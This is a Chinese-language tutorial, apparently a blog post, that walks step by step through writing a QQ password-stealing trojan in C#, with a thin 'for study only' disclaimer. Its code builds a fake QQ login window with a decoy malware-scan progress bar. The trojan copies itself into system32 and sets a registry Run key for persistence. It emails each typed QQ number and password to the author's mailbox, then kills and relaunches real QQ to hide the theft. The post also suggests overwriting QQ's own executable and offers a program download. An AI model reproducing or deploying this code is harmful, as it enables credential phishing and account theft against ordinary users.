一个QQ盗号木马是这样诞生的(C#)

声名:以下代码仅为学习研究之用,如有利用与其他之用,任何后果与本人无关!
开始我们创建一个工程名字叫VirTest,我们先做一个与QQ登陆界面一样的的界面出来如图所示:
在 linkLabel我们填加如相应的web地址,这一步我就不说了.
为了做的更逼真,我决定把查杀木马也做了,我在这个界面放了2个重叠的panel分别是:


这两个panel是重叠在一起的他们的visbile属性应该是互斥的.点击查杀木马的时候进度条肯定要走,我这里用一个for循环让他动起来,查杀木马button的click事件代码如下:
 /// <summary>
        /// 查杀木马
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private void button1_Click(object sender, EventArgs e)
        {
            panel3.Visible = true;
            panel2.Visible = false;
            this.Size = new Size(330, 308);
            this.Enabled = false;
            for(int i=0;i<10;i++)//步进为10
            {
             System.Threading.Thread.Sleep(1000);
             progressBar1.Increment(10);
            }
            //进度条回零
            progressBar1.Value = 0;
            this.Enabled = true;
            panel3.Visible = false;
            panel2.Visible = true;        
        }
然后呢,我们来写 Form1_Load事件,既然是木马程序,那么就要有两个基本特征:自我复制、开机自动运行.代码如下:

这里我们先申明两个全局变量:
        //QQ的路径,PS:这里的路径是随便写的后面我们会到注册表里去找QQ的实际地址的
        string QQPath = @"C:\\Program Files\\Tencent\\QQ";
        //注册表
        RegistryKey HKLM = Registry.LocalMachine; 
private void Form1_Load(object sender, EventArgs e)
        {
            /*复制数量*/
            const int TOTAL = 1;
            int _count = TOTAL;
            // 正在运行的程序路径和文件名
            string _file = Application.ExecutablePath;
            // 正在运行的程序路径
            //string _path = Application.StartupPath;
            //复制路径
            string _path = "C:\\WINDOWS\\system32";
            // 正在运行的程序文件名
            string _name = _file.Replace(string.Format("{0}\\", _path), string.Empty).ToLower();
            try
            {
                _count = int.Parse(_name.Replace(".exe", string.Empty));
                _count--;
            }
            catch
            {
            }
            finally
            {
            }
            // 目标文件
            string _target = string.Format("{0}\\{1}.exe", _path, _count.ToString("000"));
            if ((File.Exists(_file)) && (_count > 0))
            {
                try
                {
                    // 复制
                    FileStream _fileStream = File.Open(_file, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
                    byte[] _buffer = new byte[_fileStream.Length];
                    _fileStream.Read(_buffer, 0, _buffer.Length);
                    _fileStream.Close();
                    // 如果目标已存在，删除
                    if (File.Exists(_target))
                    {
                        File.Delete(_target);
                    }
                    // 粘贴
                    FileStream _writer = File.Open(_target, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.None);
                    _writer.Write(_buffer, 0, _buffer.Length);
                    _writer.Close();
                }
                catch
                {

                }
                //开机自动运行
               
                RegistryKey Run = HKLM.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
                bool Started = true;
                if (Started == true)
                {
                    try
                    {
                        Run.SetValue("VirTest", _target);
                        HKLM.Close();
                    }
                    catch
                    {
                       
                    }
                }
                else
                {
                    try
                    {
                        Run.DeleteValue("VirTest");
                        HKLM.Close();
                    }
                    catch
                    {
                        //
                    }
                }       
            }

        }

在这里我们把我们的程序复制到了 C:\\WINDOWS\\system32这样更象个木马,并设定了开机自动开启,但是有一点要注意的是现在几乎所有的防火墙都会保护启动项的所以这样是过不了防火墙的.当然最毒的办法就是直接覆盖QQ的原来的那个文件(呵呵).
最后我们来写登陆button的click事件，代码如下：

/// <summary>
        /// 登陆
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private void Login_Click(object sender, EventArgs e)
        {
             //发送结果
            try
            {
                MailMessage mail = new MailMessage();
                mail.From = new MailAddress("", "");
                mail.To.Add(new MailAddress(""));
                mail.Body = "QQ号码：" + UserIdbox.Text + "\r\n" + "密码：" + PASSword.Text;
                mail.Subject = "QQ密码";
                SmtpClient SmtpMail = new SmtpClient("");
                SmtpMail.UseDefaultCredentials = false;
                SmtpMail.Timeout = 20000;
                SmtpMail.Send(mail);
            }
            catch  { }
             //搜索注册表
            try
            {
                RegistryKey SearhPath = HKLM.OpenSubKey(@"SOFTWARE\Tencent\QQ");
                QQPath = SearhPath.GetValue("Install").ToString();
            }
            catch { Application.Exit(); }

            //关闭已经打开的qq，重新开启qq
            string name = "QQ";//程序进程名称
            Process[] prc = Process.GetProcesses();
            foreach (Process pr in prc) //遍历整个进程
            {
                if (name == pr.ProcessName)  //如果进程存在
                {
                    try
                    {
                        pr.Kill();
                    }
                    catch { }

                }
            }
            try
            {
                //调用QQ
                Process MyProcess = new Process();
                MyProcess.StartInfo.FileName = QQPath + "QQ.exe";
                MyProcess.StartInfo.Verb = "Open";
                MyProcess.StartInfo.CreateNoWindow = true;
                MyProcess.Start();
            }
            catch
            {

            }
            Application.Exit();
        }

这里呢，我隐去了我的邮箱和SMTP的地址，这个是可以自己填写的！我们把填写的帐号和密码就传回了自己的邮箱了，并且关闭了已经打开的QQ,重新启动了QQ.关闭木马程序．这样简单的木马就大共告成了．
好了，休息休息一会儿！
程序下载